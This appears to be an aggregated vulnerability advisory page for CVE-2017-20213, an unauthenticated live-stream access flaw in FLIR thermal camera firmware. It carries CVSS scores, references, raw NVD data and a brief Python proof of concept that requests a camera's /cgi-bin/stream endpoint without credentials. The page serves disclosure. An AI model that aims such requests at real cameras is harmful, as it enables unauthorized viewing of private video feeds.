CVE-2017-20213

Description

FLIR Thermal Camera F/FC/PT/D Stream firmware version 8.0.0.64 contains an unauthenticated vulnerability that allows remote attackers to access live camera streams without credentials. Attackers can exploit the vulnerability to view unauthorized thermal camera video feeds across multiple camera series without requiring any authentication.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

FLIR Thermal Camera F/FC/PT/D Stream < 8.0.0.64

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

python
import requests

target = 'http://target-ip:80'
stream_url = f'{target}/cgi-bin/stream'

response = requests.get(stream_url)
print(f'Status: {response.status_code}')
print(f'Content: {response.content[:100]}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2017-20213
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2017-20213
[3] CVE Details https://www.cvedetails.com/cve/CVE-2017-20213/
[4] VulDB https://vuldb.com/cve/CVE-2017-20213
[5] https://cxsecurity.com/issue/WLB-2017090204
[6] https://packetstormsecurity.com/files/144323
[7] https://web.archive.org/web/20171011125811/https://www.flir.com/security/blog/details/?ID=87043
[8] https://www.exploit-db.com/exploits/42789/
[9] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5435.php
[10] https://cxsecurity.com/issue/WLB-2017090204
[11] https://www.exploit-db.com/exploits/42789/
[12] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5435.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2017-20213", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:56.343", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FLIR Thermal Camera F/FC/PT/D Stream firmware version 8.0.0.64 contains an unauthenticated vulnerability that allows remote attackers to access live camera streams without credentials. Attackers can exploit the vulnerability to view unauthorized thermal camera video feeds across multiple camera series without requiring any authentication."}, {"lang": "es", "value": "El firmware versión 8.0.0.64 de las cámaras térmicas FLIR F/FC/PT/D Stream contiene una vulnerabilidad no autenticada que permite a atacantes remotos acceder a transmisiones de cámara en vivo sin credenciales. Los atacantes pueden explotar la vulnerabilidad para ver transmisiones de video no autorizadas de cámaras térmicas en múltiples series de cámaras sin requerir ninguna autenticación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2017090204", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/144323", "source": "[email protected]"}, {"url": "https://web.archive.org/web/20171011125811/https://www.flir.com/security/blog/details/?ID=87043", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/42789/", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5435.php", "source": "[email protected]"}, {"url": "https://cxsecurity.com/issue/WLB-2017090204", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.exploit-db.com/exploits/42789/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5435.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}